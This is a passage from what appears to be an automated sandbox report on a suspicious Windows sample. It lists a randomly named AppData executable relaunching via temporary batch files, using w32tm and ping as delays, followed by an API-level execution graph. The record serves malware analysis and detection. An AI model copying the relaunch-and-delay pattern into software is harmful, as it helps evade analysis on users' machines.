                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:07:38:04
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:07:38:04
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:07:38:04
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:07:38:10
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x780000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:07:38:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:07:38:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:07:38:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:07:38:13
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:07:38:18
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x7b0000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:07:38:20
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:07:38:20
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:07:38:21
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:07:38:21
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff7de670000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:07:38:30
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                                          Imagebase:0x540000
                                                          File size:1'937'408 bytes
                                                          MD5 hash:833E95D4CE4E4A4AD42322F75AE6FF57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:07:38:32
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
                                                          Imagebase:0x7ff606850000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:59
                                                          Start time:07:38:33
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:60
                                                          Start time:07:38:33
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7b5ed0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:61
                                                          Start time:07:38:33
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7d3db0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:07:39:02
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:94
                                                          Start time:07:39:41
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:109
                                                          Start time:07:40:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.2%
                                                            Total number of Nodes:1507
                                                            Total number of Limit Nodes:28
                                                            execution_graph 25483 101a400 GdipDisposeImage GdipFree 25484 101d600 70 API calls 25437 1022900 6 API calls 4 library calls 25439 102a700 21 API calls 25485 1026000 QueryPerformanceFrequency QueryPerformanceCounter 25487 102f200 51 API calls 25440 1001710 86 API calls 25441 101ad10 73 API calls 25490 101c220 93 API calls _swprintf 25492 102f421 21 API calls __vsnwprintf_l 25493 1001025 29 API calls 25445 101f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25446 101ff30 LocalFree 23573 102bb30 23574 102bb42 23573->23574 23575 102bb39 23573->23575 23577 102ba27 23575->23577 23597 10297e5 GetLastError 23577->23597 23579 102ba34 23617 102bb4e 23579->23617 23581 102ba3c 23626 102b7bb 23581->23626 23584 102ba53 23584->23574 23587 102ba96 23651 1028dcc 23587->23651 23591 102ba91 23650 10291a8 20 API calls __dosmaperr 23591->23650 23593 102bada 23593->23587 23657 102b691 26 API calls 23593->23657 23594 102baae 23594->23593 23595 1028dcc _free 20 API calls 23594->23595 23595->23593 23598 1029801 23597->23598 23599 10297fb 23597->23599 23603 1029850 SetLastError 23598->23603 23659 102b136 23598->23659 23658 102ae5b 11 API calls 2 library calls 23599->23658 23603->23579 23604 102981b 23606 1028dcc _free 20 API calls 23604->23606 23608 1029821 23606->23608 23607 1029830 23607->23604 23609 1029837 23607->23609 23610 102985c SetLastError 23608->23610 23667 1029649 20 API calls _abort 23609->23667 23668 1028d24 38 API calls _abort 23610->23668 23612 1029842 23614 1028dcc _free 20 API calls 23612->23614 23616 1029849 23614->23616 23616->23603 23616->23610 23618 102bb5a ___scrt_is_nonwritable_in_current_image 23617->23618 23619 10297e5 _abort 38 API calls 23618->23619 23621 102bb64 23619->23621 23623 102bbe8 _abort 23621->23623 23625 1028dcc _free 20 API calls 23621->23625 23671 1028d24 38 API calls _abort 23621->23671 23672 102ac31 EnterCriticalSection 23621->23672 23673 102bbdf LeaveCriticalSection _abort 23621->23673 23623->23581 23625->23621 23674 1024636 23626->23674 23629 102b7ee 23631 102b7f3 GetACP 23629->23631 23632 102b805 23629->23632 23630 102b7dc GetOEMCP 23630->23632 23631->23632 23632->23584 23633 1028e06 23632->23633 23634 1028e44 23633->23634 23639 1028e14 _abort 23633->23639 23685 10291a8 20 API calls __dosmaperr 23634->23685 23635 1028e2f RtlAllocateHeap 23637 1028e42 23635->23637 23635->23639 23637->23587 23640 102bbf0 23637->23640 23639->23634 23639->23635 23684 1027a5e 7 API calls 2 library calls 23639->23684 23641 102b7bb 40 API calls 23640->23641 23642 102bc0f 23641->23642 23644 102bc60 IsValidCodePage 23642->23644 23647 102bc16 23642->23647 23649 102bc85 _abort 23642->23649 23646 102bc72 GetCPInfo 23644->23646 23644->23647 23645 102ba89 23645->23591 23645->23594 23646->23647 23646->23649 23696 101fbbc 23647->23696 23686 102b893 GetCPInfo 23649->23686 23650->23587 23652 1028dd7 RtlFreeHeap 23651->23652 23653 1028e00 _free 23651->23653 23652->23653 23654 1028dec 23652->23654 23653->23584 23777 10291a8 20 API calls __dosmaperr 23654->23777 23656 1028df2 GetLastError 23656->23653 23657->23587 23658->23598 23664 102b143 _abort 23659->23664 23660 102b183 23670 10291a8 20 API calls __dosmaperr 23660->23670 23661 102b16e RtlAllocateHeap 23662 1029813 23661->23662 23661->23664 23662->23604 23666 102aeb1 11 API calls 2 library calls 23662->23666 23664->23660 23664->23661 23669 1027a5e 7 API calls 2 library calls 23664->23669 23666->23607 23667->23612 23669->23664 23670->23662 23672->23621 23673->23621 23675 1024653 23674->23675 23681 1024649 23674->23681 23676 10297e5 _abort 38 API calls 23675->23676 23675->23681 23677 1024674 23676->23677 23682 102993a 38 API calls __fassign 23677->23682 23679 102468d 23683 1029967 38 API calls __fassign 23679->23683 23681->23629 23681->23630 23682->23679 23683->23681 23684->23639 23685->23637 23687 102b977 23686->23687 23692 102b8cd 23686->23692 23689 101fbbc _ValidateLocalCookies 5 API calls 23687->23689 23691 102ba23 23689->23691 23691->23647 23703 102c988 23692->23703 23695 102ab78 __vsnwprintf_l 43 API calls 23695->23687 23697 101fbc5 IsProcessorFeaturePresent 23696->23697 23698 101fbc4 23696->23698 23700 101fc07 23697->23700 23698->23645 23776 101fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23700->23776 23702 101fcea 23702->23645 23704 1024636 __fassign 38 API calls 23703->23704 23705 102c9a8 MultiByteToWideChar 23704->23705 23707 102c9e6 23705->23707 23714 102ca7e 23705->23714 23709 102ca07 _abort __vsnwprintf_l 23707->23709 23710 1028e06 __vsnwprintf_l 21 API calls 23707->23710 23708 101fbbc _ValidateLocalCookies 5 API calls 23711 102b92e 23708->23711 23712 102ca78 23709->23712 23715 102ca4c MultiByteToWideChar 23709->23715 23710->23709 23717 102ab78 23711->23717 23722 102abc3 20 API calls _free 23712->23722 23714->23708 23715->23712 23716 102ca68 GetStringTypeW 23715->23716 23716->23712 23718 1024636 __fassign 38 API calls 23717->23718 23719 102ab8b 23718->23719 23723 102a95b 23719->23723 23722->23714 23724 102a976 __vsnwprintf_l 23723->23724 23725 102a99c MultiByteToWideChar 23724->23725 23726 102ab50 23725->23726 23727 102a9c6 23725->23727 23728 101fbbc _ValidateLocalCookies 5 API calls 23726->23728 23732 1028e06 __vsnwprintf_l 21 API calls 23727->23732 23734 102a9e7 __vsnwprintf_l 23727->23734 23729 102ab63 23728->23729 23729->23695 23730 102aa30 MultiByteToWideChar 23731 102aa9c 23730->23731 23733 102aa49 23730->23733 23759 102abc3 20 API calls _free 23731->23759 23732->23734 23750 102af6c 23733->23750 23734->23730 23734->23731 23738 102aa73 23738->23731 23741 102af6c __vsnwprintf_l 11 API calls 23738->23741 23739 102aaab 23740 1028e06 __vsnwprintf_l 21 API calls 23739->23740 23744 102aacc __vsnwprintf_l 23739->23744 23740->23744 23741->23731 23742 102ab41 23758 102abc3 20 API calls _free 23742->23758 23744->23742 23745 102af6c __vsnwprintf_l 11 API calls 23744->23745 23746 102ab20 23745->23746 23746->23742 23747 102ab2f WideCharToMultiByte 23746->23747 23747->23742 23748 102ab6f 23747->23748 23760 102abc3 20 API calls _free 23748->23760 23761 102ac98 23750->23761 23754 102afdc LCMapStringW 23755 102af9c 23754->23755 23756 101fbbc _ValidateLocalCookies 5 API calls 23755->23756 23757 102aa60 23756->23757 23757->23731 23757->23738 23757->23739 23758->23731 23759->23726 23760->23731 23762 102acc8 23761->23762 23765 102acc4 23761->23765 23762->23755 23768 102aff4 10 API calls 3 library calls 23762->23768 23763 102ace8 23763->23762 23766 102acf4 GetProcAddress 23763->23766 23765->23762 23765->23763 23769 102ad34 23765->23769 23767 102ad04 _abort 23766->23767 23767->23762 23768->23754 23770 102ad55 LoadLibraryExW 23769->23770 23771 102ad4a 23769->23771 23772 102ad72 GetLastError 23770->23772 23773 102ad8a 23770->23773 23771->23765 23772->23773 23774 102ad7d LoadLibraryExW 23772->23774 23773->23771 23775 102ada1 FreeLibrary 23773->23775 23774->23773 23775->23771 23776->23702 23777->23656 25495 102c030 GetProcessHeap 25496 101a440 GdipCloneImage GdipAlloc 25497 1023a40 5 API calls _ValidateLocalCookies 25449 1031f40 CloseHandle 24427 102c051 31 API calls _ValidateLocalCookies 25499 101e455 14 API calls ___delayLoadHelper2@8 24461 101cd58 24462 101ce22 24461->24462 24468 101cd7b 24461->24468 24477 101c793 _wcslen _wcsrchr 24462->24477 24489 101d78f 24462->24489 24465 101d40a 24467 1011fbb CompareStringW 24467->24468 24468->24462 24468->24467 24469 101ca67 SetWindowTextW 24469->24477 24474 101c855 SetFileAttributesW 24475 101c90f GetFileAttributesW 24474->24475 24487 101c86f _abort _wcslen 24474->24487 24475->24477 24479 101c921 DeleteFileW 24475->24479 24477->24465 24477->24469 24477->24474 24481 101cc31 GetDlgItem SetWindowTextW SendMessageW 24477->24481 24483 101cc71 SendMessageW 24477->24483 24488 1011fbb CompareStringW 24477->24488 24513 101b314 24477->24513 24517 101a64d GetCurrentDirectoryW 24477->24517 24519 100a5d1 6 API calls 24477->24519 24520 100a55a FindClose 24477->24520 24521 101b48e 76 API calls 2 library calls 24477->24521 24522 1023e3e 24477->24522 24479->24477 24480 101c932 24479->24480 24482 1004092 _swprintf 51 API calls 24480->24482 24481->24477 24484 101c952 GetFileAttributesW 24482->24484 24483->24477 24484->24480 24485 101c967 MoveFileW 24484->24485 24485->24477 24486 101c97f MoveFileExW 24485->24486 24486->24477 24487->24475 24487->24477 24518 100b991 51 API calls 2 library calls 24487->24518 24488->24477 24491 101d799 _abort _wcslen 24489->24491 24490 101d9e7 24490->24477 24491->24490 24492 101d8a5 24491->24492 24493 101d9c0 24491->24493 24538 1011fbb CompareStringW 24491->24538 24535 100a231 24492->24535 24493->24490 24497 101d9de ShowWindow 24493->24497 24497->24490 24498 101d8d9 ShellExecuteExW 24498->24490 24505 101d8ec 24498->24505 24500 101d8d1 24500->24498 24501 101d925 24540 101dc3b 6 API calls 24501->24540 24502 101d97b CloseHandle 24503 101d989 24502->24503 24504 101d994 24502->24504 24541 1011fbb CompareStringW 24503->24541 24504->24493 24505->24501 24505->24502 24507 101d91b ShowWindow 24505->24507 24507->24501 24509 101d93d 24509->24502 24510 101d950 GetExitCodeProcess 24509->24510 24510->24502 24511 101d963 24510->24511 24511->24502 24514 101b31e 24513->24514 24515 101b40d 24514->24515 24516 101b3f0 ExpandEnvironmentStringsW 24514->24516 24515->24477 24516->24515 24517->24477 24518->24487 24519->24477 24520->24477 24521->24477 24523 1028e54 24522->24523 24524 1028e61 24523->24524 24525 1028e6c 24523->24525 24526 1028e06 __vsnwprintf_l 21 API calls 24524->24526 24527 1028e74 24525->24527 24534 1028e7d _abort 24525->24534 24531 1028e69 24526->24531 24528 1028dcc _free 20 API calls 24527->24528 24528->24531 24529 1028e82 24550 10291a8 20 API calls __dosmaperr 24529->24550 24530 1028ea7 HeapReAlloc 24530->24531 24530->24534 24531->24477 24534->24529 24534->24530 24551 1027a5e 7 API calls 2 library calls 24534->24551 24542 100a243 24535->24542 24538->24492 24539 100b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24539->24500 24540->24509 24541->24504 24543 101ec50 24542->24543 24544 100a250 GetFileAttributesW 24543->24544 24545 100a261 24544->24545 24546 100a23a 24544->24546 24547 100bb03 GetCurrentDirectoryW 24545->24547 24546->24498 24546->24539 24548 100a275 24547->24548 24548->24546 24549 100a279 GetFileAttributesW 24548->24549 24549->24546 24550->24531 24551->24534 25501 1028268 55 API calls _free 25502 101c793 107 API calls 4 library calls 25452 1027f6e 52 API calls 2 library calls 25503 101a070 10 API calls 25505 101b270 99 API calls 25454 1001f72 128 API calls __EH_prolog 25414 1009a74 25415 1009a7e 25414->25415 25416 1009b9d SetFilePointer 25415->25416 25418 100981a 79 API calls 25415->25418 25419 1009b79 25415->25419 25420 1009ab1 25415->25420 25417 1009bb6 GetLastError 25416->25417 25416->25420 25417->25420 25418->25419 25419->25416 25506 1001075 84 API calls 25422 1009f7a 25423 1009f88 25422->25423 25424 1009f8f 25422->25424 25425 1009f9c GetStdHandle 25424->25425 25427 1009fab 25424->25427 25425->25427 25426 100a003 WriteFile 25426->25427 25427->25423 25427->25426 25428 1009fd4 WriteFile 25427->25428 25429 1009fcf 25427->25429 25431 100a095 25427->25431 25433 1006baa 78 API calls 25427->25433 25428->25427 25428->25429 25429->25427 25429->25428 25434 1006e98 77 API calls 25431->25434 25433->25427 25434->25423 25456 1019580 6 API calls 25509 101c793 102 API calls 4 library calls 25510 101c793 97 API calls 4 library calls 25460 101b18d 78 API calls 25512 101dca1 DialogBoxParamW 25461 101f3a0 27 API calls 25515 102a4a0 71 API calls _free 25516 10308a0 IsProcessorFeaturePresent 25462 101eda7 48 API calls _unexpected 25464 1006faa 111 API calls 3 library calls 23515 101e5b1 23517 101e578 23515->23517 23518 101e85d 23517->23518 23544 101e5bb 23518->23544 23520 101e86d 23521 101e8ca 23520->23521 23532 101e8ee 23520->23532 23522 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23521->23522 23523 101e8d5 RaiseException 23522->23523 23524 101eac3 23523->23524 23524->23517 23525 101e966 LoadLibraryExA 23526 101e9c7 23525->23526 23527 101e979 GetLastError 23525->23527 23531 101e9d9 23526->23531 23533 101e9d2 FreeLibrary 23526->23533 23528 101e9a2 23527->23528 23529 101e98c 23527->23529 23534 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23528->23534 23529->23526 23529->23528 23530 101ea37 GetProcAddress 23535 101ea47 GetLastError 23530->23535 23539 101ea95 23530->23539 23531->23530 23531->23539 23532->23525 23532->23526 23532->23531 23532->23539 23533->23531 23536 101e9ad RaiseException 23534->23536 23543 101ea5a 23535->23543 23536->23524 23538 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23540 101ea7b RaiseException 23538->23540 23553 101e7fb 23539->23553 23541 101e5bb ___delayLoadHelper2@8 6 API calls 23540->23541 23542 101ea92 23541->23542 23542->23539 23543->23538 23543->23539 23545 101e5c7 23544->23545 23546 101e5ed 23544->23546 23561 101e664 23545->23561 23546->23520 23548 101e5cc 23549 101e5e8 23548->23549 23564 101e78d 23548->23564 23569 101e5ee GetModuleHandleW GetProcAddress GetProcAddress 23549->23569 23552 101e836 23552->23520 23554 101e80d 23553->23554 23555 101e82f 23553->23555 23556 101e664 DloadReleaseSectionWriteAccess 3 API calls 23554->23556 23555->23524 23557 101e812 23556->23557 23558 101e82a 23557->23558 23559 101e78d DloadProtectSection 3 API calls 23557->23559 23572 101e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23558->23572 23559->23558 23570 101e5ee GetModuleHandleW GetProcAddress GetProcAddress 23561->23570 23563 101e669 23563->23548 23565 101e7a2 DloadProtectSection 23564->23565 23566 101e7a8 23565->23566 23567 101e7dd VirtualProtect 23565->23567 23571 101e6a3 VirtualQuery GetSystemInfo 23565->23571 23566->23549 23567->23566 23569->23552 23570->23563 23571->23567 23572->23555 25465 101b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23780 101f3b2 23781 101f3be ___scrt_is_nonwritable_in_current_image 23780->23781 23812 101eed7 23781->23812 23783 101f3c5 23784 101f518 23783->23784 23787 101f3ef 23783->23787 23885 101f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23784->23885 23786 101f51f 23878 1027f58 23786->23878 23799 101f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23787->23799 23823 1028aed 23787->23823 23794 101f40e 23796 101f48f 23831 101f953 GetStartupInfoW _abort 23796->23831 23798 101f495 23832 1028a3e 51 API calls 23798->23832 23799->23796 23881 1027af4 38 API calls _abort 23799->23881 23802 101f49d 23833 101df1e 23802->23833 23806 101f4b1 23806->23786 23807 101f4b5 23806->23807 23808 101f4be 23807->23808 23883 1027efb 28 API calls _abort 23807->23883 23884 101f048 12 API calls ___scrt_uninitialize_crt 23808->23884 23811 101f4c6 23811->23794 23813 101eee0 23812->23813 23887 101f654 IsProcessorFeaturePresent 23813->23887 23815 101eeec 23888 1022a5e 23815->23888 23817 101eef1 23822 101eef5 23817->23822 23896 1028977 23817->23896 23820 101ef0c 23820->23783 23822->23783 23825 1028b04 23823->23825 23824 101fbbc _ValidateLocalCookies 5 API calls 23826 101f408 23824->23826 23825->23824 23826->23794 23827 1028a91 23826->23827 23828 1028ac0 23827->23828 23829 101fbbc _ValidateLocalCookies 5 API calls 23828->23829 23830 1028ae9 23829->23830 23830->23799 23831->23798 23832->23802 23996 1010863 23833->23996 23837 101df3d 24045 101ac16 23837->24045 23839 101df46 _abort 23840 101df59 GetCommandLineW 23839->23840 23841 101dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23840->23841 23842 101df68 23840->23842 24060 1004092 23841->24060 24049 101c5c4 23842->24049 23848 101dfe0 24054 101dbde 23848->24054 23849 101df76 OpenFileMappingW 23852 101dfd6 CloseHandle 23849->23852 23853 101df8f MapViewOfFile 23849->23853 23852->23841 23855 101dfa0 __InternalCxxFrameHandler 23853->23855 23856 101dfcd UnmapViewOfFile 23853->23856 23859 101dbde 2 API calls 23855->23859 23856->23852 23861 101dfbc 23859->23861 23861->23856 23862 10190b7 8 API calls 23863 101e0aa DialogBoxParamW 23862->23863 23864 101e0e4 23863->23864 23865 101e0f6 Sleep 23864->23865 23866 101e0fd 23864->23866 23865->23866 23869 101e10b 23866->23869 24093 101ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23866->24093 23868 101e12a DeleteObject 23870 101e13f DeleteObject 23868->23870 23871 101e146 23868->23871 23869->23868 23870->23871 23872 101e177 23871->23872 23873 101e189 23871->23873 24094 101dc3b 6 API calls 23872->24094 24090 101ac7c 23873->24090 23876 101e17d CloseHandle 23876->23873 23877 101e1c3 23882 101f993 GetModuleHandleW 23877->23882 24345 1027cd5 23878->24345 23881->23796 23882->23806 23883->23808 23884->23811 23885->23786 23887->23815 23900 1023b07 23888->23900 23892 1022a6f 23893 1022a7a 23892->23893 23914 1023b43 DeleteCriticalSection 23892->23914 23893->23817 23895 1022a67 23895->23817 23943 102c05a 23896->23943 23899 1022a7d 7 API calls 2 library calls 23899->23822 23901 1023b10 23900->23901 23903 1023b39 23901->23903 23904 1022a63 23901->23904 23915 1023d46 23901->23915 23920 1023b43 DeleteCriticalSection 23903->23920 23904->23895 23906 1022b8c 23904->23906 23936 1023c57 23906->23936 23909 1022ba1 23909->23892 23911 1022baf 23912 1022bbc 23911->23912 23942 1022bbf 6 API calls ___vcrt_FlsFree 23911->23942 23912->23892 23914->23895 23921 1023c0d 23915->23921 23918 1023d7e InitializeCriticalSectionAndSpinCount 23919 1023d69 23918->23919 23919->23901 23920->23904 23922 1023c4f 23921->23922 23923 1023c26 23921->23923 23922->23918 23922->23919 23923->23922 23928 1023b72 23923->23928 23926 1023c3b GetProcAddress 23926->23922 23927 1023c49 23926->23927 23927->23922 23929 1023b7e ___vcrt_InitializeCriticalSectionEx 23928->23929 23930 1023bf3 23929->23930 23931 1023b95 LoadLibraryExW 23929->23931 23935 1023bd5 LoadLibraryExW 23929->23935 23930->23922 23930->23926 23932 1023bb3 GetLastError 23931->23932 23933 1023bfa 23931->23933 23932->23929 23933->23930 23934 1023c02 FreeLibrary 23933->23934 23934->23930 23935->23929 23935->23933 23937 1023c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23936->23937 23938 1023c71 23937->23938 23939 1023c8a TlsAlloc 23938->23939 23940 1022b96 23938->23940 23940->23909 23941 1023d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23940->23941 23941->23911 23942->23909 23944 102c077 23943->23944 23947 102c073 23943->23947 23944->23947 23949 102a6a0 23944->23949 23945 101fbbc _ValidateLocalCookies 5 API calls 23946 101eefe 23945->23946 23946->23820 23946->23899 23947->23945 23950 102a6ac ___scrt_is_nonwritable_in_current_image 23949->23950 